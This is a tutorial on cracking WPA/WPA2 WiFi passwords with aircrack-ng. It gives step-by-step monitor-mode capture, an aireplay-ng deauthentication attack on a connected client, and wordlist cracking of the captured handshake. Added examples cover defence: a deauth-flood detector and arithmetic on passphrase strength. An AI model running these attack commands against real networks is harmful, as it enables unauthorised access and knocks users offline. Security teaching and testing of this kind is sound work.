Breaking WPA/WPA2 WiFi Passwords With Aircrack
In this exercise we are going to try and crack the password of a WiFi access point. We will cover
- Identifying The Target Network
- Capturing Traffic To And From The Network
- Deauth/Jamming Attack
- Cracking The Password
Identifying The Target Network
To start with, put your WiFi adapter into monitor mode by opening a terminal and typing
airmon-ng start wlx123456789
Replace wlx123456789 with the name of your adapter. If you aren't sure what this is, type iwconfig. When you run the airmon-ng start command, the adapter will typically be renamed to something like wlan0mon, but if it is called something else then just use that name instead in the following commands. Next enter the command
airodump-ng wlan0mon
This should bring up a table similar to the one below in your terminal. It lists all nearby WiFi access points and, among other things, their BSSID and the channel they are operating on.
BSSID | PWR | Beacons | Data | #/s | CH | MB | ENC | CIPHER | AUTH | ESSID
---|---|---|---|---|---|---|---|---|---|---
A1:23:B1:45:C1:67 | -70 | 3 | 2 | 0 | 6 | 130 | WPA2 | CCMP | PSK | EE-TestNetwork
Capturing Traffic To And From The Network
We can see our target network (EE-TestNetwork) and its BSSID (MAC address), as well as the fact that it's using channel 6. We're going to instruct our WiFi adapter to start monitoring and logging all traffic to and from that network.
airodump-ng --write /home/kali/Desktop/EE-TestCaptureFile --bssid A1:23:B1:45:C1:67 --channel 6 wlan0mon
After doing this, you should see output similar to before, but with an additional table listing the clients currently connected to that access point.
BSSID | PWR | Beacons | Data | #/s | CH | MB | ENC | CIPHER | AUTH | ESSID
---|---|---|---|---|---|---|---|---|---|---
A1:23:B1:45:C1:67 | -70 | 3 | 2 | 0 | 6 | 130 | WPA2 | CCMP | PSK | EE-TestNetwork
BSSID | STATION | PWR | Rate | Lost | Frames | Notes | Probes
---|---|---|---|---|---|---|---
A1:23:B1:45:C1:67 | D3:55:F1:AF:34:99 | -40 | 0e- 4e | 0 | 40000 | |
This means there is one user currently connected to our target network, and their device has the MAC address D3:55:F1:AF:34:99.
Deauth/Jamming Attack (Optional)
So far we have identified our target network and started monitoring all traffic to and from it. In order to crack the WiFi password we need to capture the WPA handshake. This handshake is only exchanged while a client is in the process of connecting to the network, but as we can see, the user on our target network is already connected. We have a couple of options here, and below is a brief info box discussing the differences between them.
- We can simply wait for a legitimate user to connect, at which point you will see a notice in the top right of your terminal saying "WPA handshake". If you are doing this, then skip to the next step.
- We can launch a deauth attack, which attempts to knock the legitimate user offline. When they reconnect, we'll capture the handshake.
Waiting patiently for a legitimate user to connect is known as a passive attack. It is completely undetectable but there's no telling how long you could wait for a user to connect. It could be hours, even days.
Deauth/jamming is an active attack. If you are successful you should capture a WPA handshake within seconds. But an attack like this is highly detectable and leaves logs in the target network showing a deauth attack has occurred.
If you are choosing an active attack, then in order to start jamming the legitimate user, open a new terminal and enter the following
aireplay-ng -0 1 -a A1:23:B1:45:C1:67 -c D3:55:F1:AF:34:99 wlan0mon
- -0 tells aireplay-ng to send de-authentication frames
- 1 is the number of de-auth frames to send. Enter 0 to send them continuously
- -a A1:23:B1:45:C1:67 is the MAC address of the target WiFi AP
- -c D3:55:F1:AF:34:99 is the MAC address of the client you want to deauthenticate. If you omit this, all clients will be deauthenticated
- wlan0mon is the interface name
If this is successful, you should see a notice in the top right of the first terminal saying “WPA handshake”. This means we have captured the handshake and can now attempt to crack the password.
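The info box above notes that a deauth attack is highly detectable. The following is an added example, not part of the original tutorial, showing the detection side: a small sliding-window detector that reads a constructed monitor-mode frame log (the log format, the timestamps and the MAC addresses reused from the tables above are all made up for this example, not real airodump-ng output) and raises an alert when one source sends a burst of deauthentication frames to one client. A single deauth is normal (an AP drops an idle client), so the detector keys on rate, not on the mere presence of the frame.

```python
import re
from collections import defaultdict

# Constructed sample of a monitor-mode frame log (invented for this example; not a real
# tool's format): "<epoch secs> <subtype> <src MAC> <dst MAC> [reason=N]".
# The burst at ...01.00-01.10 is what a deauth flood looks like; the lone deauth at
# ...90.00 is the kind of single frame an AP legitimately sends to an idle client.
SAMPLE_LOG = """\
1700000000.10 beacon A1:23:B1:45:C1:67 ff:ff:ff:ff:ff:ff
1700000000.55 data   D3:55:F1:AF:34:99 A1:23:B1:45:C1:67
1700000001.00 deauth A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 reason=7
1700000001.02 deauth A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 reason=7
1700000001.04 deauth A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 reason=7
1700000001.06 deauth A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 reason=7
1700000001.08 deauth A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 reason=7
1700000001.10 deauth A1:23:B1:45:C1:67 D3:55:F1:AF:34:99 reason=7
1700000003.00 data   D3:55:F1:AF:34:99 A1:23:B1:45:C1:67
1700000090.00 deauth A1:23:B1:45:C1:67 11:22:33:44:55:66 reason=4
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<subtype>\w+)\s+"
    rf"(?P<src>{MAC})\s+(?P<dst>{MAC})"
    r"(?:\s+reason=(?P<reason>\d+))?\s*$"
)


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped so that
    junk in the log cannot crash the detector."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        yield {
            "ts": float(m["ts"]),
            "subtype": m["subtype"].lower(),
            "src": m["src"].upper(),
            "dst": m["dst"].upper(),
            "reason": int(m["reason"]) if m["reason"] else None,
        }


def detect_deauth_flood(text, threshold=5, window=2.0):
    """Flag any (source, destination) pair that sends `threshold` or more
    deauthentication frames within `window` seconds (sliding window).
    Returns the alerts in the order they were raised; an alert's count keeps
    growing while the burst continues."""
    recent = defaultdict(list)   # (src, dst) -> timestamps still inside the window
    active = {}                  # (src, dst) -> alert already raised for this pair
    alerts = []
    for frame in parse_log(text):
        if frame["subtype"] != "deauth":
            continue
        key = (frame["src"], frame["dst"])
        times = recent[key]
        times.append(frame["ts"])
        # Age out timestamps that have fallen outside the window.
        while times and frame["ts"] - times[0] > window:
            times.pop(0)
        if len(times) < threshold:
            continue
        if key in active:
            active[key]["count"] = max(active[key]["count"], len(times))
            active[key]["last_ts"] = frame["ts"]
        else:
            active[key] = {
                "src": key[0], "dst": key[1], "count": len(times),
                "first_ts": times[0], "last_ts": frame["ts"],
                "reason": frame["reason"],
            }
            alerts.append(active[key])
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_LOG):
        print(f"deauth flood: {a['src']} -> {a['dst']}, {a['count']} frames "
              f"in {a['last_ts'] - a['first_ts']:.2f}s (reason={a['reason']})")
```

Two design points: the forged frames carry the AP's own address as source, so the detector cannot trust the source field and relies on rate instead; and the real fix is on the AP side, since Protected Management Frames (802.11w) authenticate deauthentication frames and make unsigned forgeries ignorable by the client.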
Cracking The WPA Password
We have now captured the WPA handshake. When we started logging traffic to and from the network, airodump-ng created a few new files for us on the desktop, named after the --write prefix with a sequence number appended (EE-TestCaptureFile-01.cap plus CSV/XML companions). The one we need is the .cap file.
Run the following command (if your wordlist is in a different directory then use that path instead)
aircrack-ng /home/kali/Desktop/EE-TestCaptureFile-01.cap -w /home/kali/Desktop/wordlist.txt
This will try every word in our wordlist against the WPA handshake. If the WiFi network is using a password that appears in our wordlist, it will be displayed on the terminal.
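To make clear why the wordlist attack above works, and what makes it fail, here is an added example (not from the original tutorial or the aircrack-ng project) that derives the WPA/WPA2-Personal pairwise master key the way the 802.11 standard defines it, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, and then does the defender's arithmetic: how many derivations a guess costs, whether a passphrase appears in a wordlist at all, and how long exhausting a given passphrase length would take. The function names, the sample wordlist and the guess rate used in the printout are assumptions made for this example.

```python
import hashlib
import time

# Constructed wordlist fragment for the audit below (made up for this example).
SAMPLE_WORDLIST = "password\n123456\nletmein\nqwerty123\nsummer2020\n"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID acts as the salt, which is why precomputed tables only work per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def measure_guess_rate(ssid: str = "EE-TestNetwork", samples: int = 100) -> float:
    """Derivations per second this machine manages in pure Python. A dedicated
    cracking tool on a GPU is orders of magnitude faster, so treat this only as a
    lower bound on what an attacker can do."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate-{i}", ssid)
    return samples / (time.perf_counter() - start)


def seconds_to_exhaust(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every passphrase of `length` symbols drawn from a
    `charset_size`-symbol alphabet at the given guess rate."""
    return (charset_size ** length) / guesses_per_second


def in_wordlist(passphrase: str, wordlist: str) -> bool:
    """True if the passphrase is a line of the wordlist: exactly the condition
    under which a wordlist run against the handshake succeeds."""
    return passphrase in set(wordlist.splitlines())


if __name__ == "__main__":
    # IEEE 802.11 published test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    rate = measure_guess_rate()
    print(f"pure-Python guess rate on this machine: {rate:,.0f}/s")

    year = 365 * 24 * 3600
    assumed_rate = 1e6  # assumption: a GPU-class rate, used only to scale the estimates
    for label, charset, length in (("8 lowercase letters", 26, 8),
                                   ("12 mixed-case+digits", 62, 12),
                                   ("16 mixed-case+digits", 62, 16)):
        years = seconds_to_exhaust(charset, length, assumed_rate) / year
        print(f"{label:24s} exhausted in {years:.3g} years at {assumed_rate:,.0f}/s")

    for candidate in ("letmein", "correct horse battery staple"):
        print(f"{candidate!r} in wordlist: {in_wordlist(candidate, SAMPLE_WORDLIST)}")
```

The takeaway for whoever runs the network: the 4096-iteration PBKDF2 makes each guess expensive, but expense alone does not save a passphrase that is in a wordlist; length and randomness do, and the SSID salt means a non-default SSID forces the attacker to compute everything from scratch for that network.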